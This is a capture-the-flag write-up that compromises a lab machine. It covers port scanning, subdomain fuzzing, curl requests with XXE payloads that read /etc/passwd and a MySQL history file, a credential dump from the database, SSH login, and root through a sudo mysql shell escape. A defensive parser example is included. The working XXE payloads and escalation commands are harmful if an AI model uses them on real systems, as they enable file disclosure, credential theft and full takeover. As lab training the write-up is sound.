# Lab setup

Download: External

NAT, IP: 192.168.1.139

# Penetration process

# Initial information gathering

```
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: 404 Not Found
3306/tcp open  mysql   MySQL 5.5.5-10.5.19-MariaDB-0+deb11u2
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.5.19-MariaDB-0+deb11u2
|   Thread ID: 7
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, InteractiveClient, Speaks41ProtocolOld, SupportsLoadDataLocal, ConnectWithDatabase, SupportsTransactions, IgnoreSpaceBeforeParenthesis, LongColumnFlag, IgnoreSigpipes, Speaks41ProtocolNew, SupportsCompression, DontAllowDatabaseTableColumn, ODBCClient, FoundRows, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: *fGoy2*yF2e(7xz}$9/#
|_  Auth Plugin Name: mysql_native_password
```

The page source (F12) hints at adding the DNS name ext.nyx, but that alone leads nowhere, so brute-force subdomains instead:

```
┌──(root㉿kali)-[~]
└─# wfuzz -t 200 -c --hw=24 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.ext.nyx" http://ext.nyx
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://ext.nyx/
Total requests: 114441
=====================================================================
ID           Response   Lines    Word       Chars       Payload                            
=====================================================================
000007602:   200        25 L     56 W       1089 Ch     "administrator"
```

Add administrator.ext.nyx to the hosts file.

Visit the site and register; the registration form POSTs its data as XML.

So test whether the endpoint is vulnerable to XXE:

```
┌──(root㉿kali)-[~]
└─# curl -X POST "http://administrator.ext.nyx/form.php" -d '<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE foo [<!ENTITY myentity "XXE VULNERABLE!"> ]>
<details>
<email>
&myentity;
</email>
<password>1234</password>
</details>'
<p align='center'> <font color=white size='5pt'> 
XXE VULNERABLE!
 is already registered! </font> </p>
```

The entity is expanded in the response, so the endpoint is vulnerable. Next, include /etc/passwd:

```
┌──(root㉿kali)-[~]
└─# curl -X POST "http://administrator.ext.nyx/form.php" -d '<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<details>
<email>
&xxe;
</email>
<password>1234</password>
</details>'
<p align='center'> <font color=white size='5pt'> 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
admin:x:1000:1000:admin,,,:/home/admin:/bin/bash
 is already registered! </font> </p>
```

With passwd in hand (it shows a login user named admin), and knowing from the earlier scan that a database is running, include that user's MySQL history file:

```
┌──(root㉿kali)-[~]
└─# curl -X POST "http://administrator.ext.nyx/form.php" -d '<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///home/admin/.mysql_history"> ]>
<details>
<email>
&xxe;
</email>
<password>1234</password>
</details>'
<p align='center'> <font color=white size='5pt'> 
ALTER USER 'root'@'%' IDENTIFIED BY 'r00tt00rDB';
exit;
 is already registered! </font> </p>
```
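The root cause of all three requests above is a server-side XML parser that honours the DOCTYPE in user input. The box's form.php is not shown, so the following is an added example of my own (not the machine's code): a Python parser for the same `<details>` document that rejects any DTD before an entity can be declared, with constructed sample bodies mirroring the clean and the probe requests.

```python
import xml.parsers.expat as expat

class UnsafeXML(ValueError):
    """Raised when the registration body carries a DTD or is malformed."""

def parse_registration(body: bytes) -> dict:
    """Extract <email> and <password> from a <details> document, refusing any DTD."""
    parser = expat.ParserCreate()
    fields, text = {}, []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at "<!DOCTYPE", before any <!ENTITY> is declared, so neither probe is expanded.
        raise UnsafeXML("DOCTYPE declarations are not accepted")

    def on_external_entity(context, base, sysid, pubid):
        # Defence in depth: never resolve file:///, http:// and similar SYSTEM ids.
        raise UnsafeXML("external entity reference refused")

    def on_end(name):
        if name in ("email", "password"):
            fields[name] = "".join(text).strip()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = lambda name, attrs: text.clear()
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = text.append
    try:
        parser.Parse(body, True)
    except expat.ExpatError as exc:
        raise UnsafeXML(f"malformed XML: {exc}") from None
    if set(fields) != {"email", "password"}:
        raise UnsafeXML("email and password are required")
    return fields

def accept_registration(body: bytes) -> tuple:
    """Return (True, fields) for a clean body, (False, reason) otherwise."""
    try:
        return True, parse_registration(body)
    except UnsafeXML as exc:
        return False, str(exc)

# Constructed sample bodies: a normal registration, then the two probes from the
# writeup (internal entity, and a SYSTEM entity pointing at /etc/passwd).
CLEAN = b"<?xml version='1.0'?><details><email>a@ext.nyx</email><password>1234</password></details>"
INTERNAL_ENTITY = (b"<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY myentity 'XXE VULNERABLE!'>]>"
                   b"<details><email>&myentity;</email><password>1234</password></details>")
SYSTEM_ENTITY = (b"<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>"
                 b"<details><email>&xxe;</email><password>1234</password></details>")
```

With this parser the probe bodies are refused outright, so the server never echoes file contents back in the "is already registered" message.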

This reveals the database password: r00tt00rDB

Log into the database and query the data:

```
┌──(root㉿kali)-[~]
└─# mysql -h 192.168.1.139 -u root -pr00tt00rDB
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 5
Server version: 10.5.19-MariaDB-0+deb11u2 Debian 11
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| admindb            |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.004 sec)
MariaDB [(none)]> use admindb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [admindb]> show tables;
+-------------------+
| Tables_in_admindb |
+-------------------+
| credentials       |
+-------------------+
1 row in set (0.001 sec)
MariaDB [admindb]> select * from credentials;
+------+-------+--------------------------+
| id   | user  | password                 |
+------+-------+--------------------------+
|    1 | admin | 4dminDBS3cur3P4ssw0rd123 |
+------+-------+--------------------------+
1 row in set (0.005 sec)
```

With these credentials, SSH in as admin.

# Privilege escalation

sudo -l shows that mysql may be run with sudo, and the client's `\!` shell escape then runs as root:

```
admin@external:~$ sudo mysql -pr00tt00rDB -e '\! /bin/sh'
# cat /root/root.txt
059ca941ad55fd318d68e675f85dd733
```

Root obtained.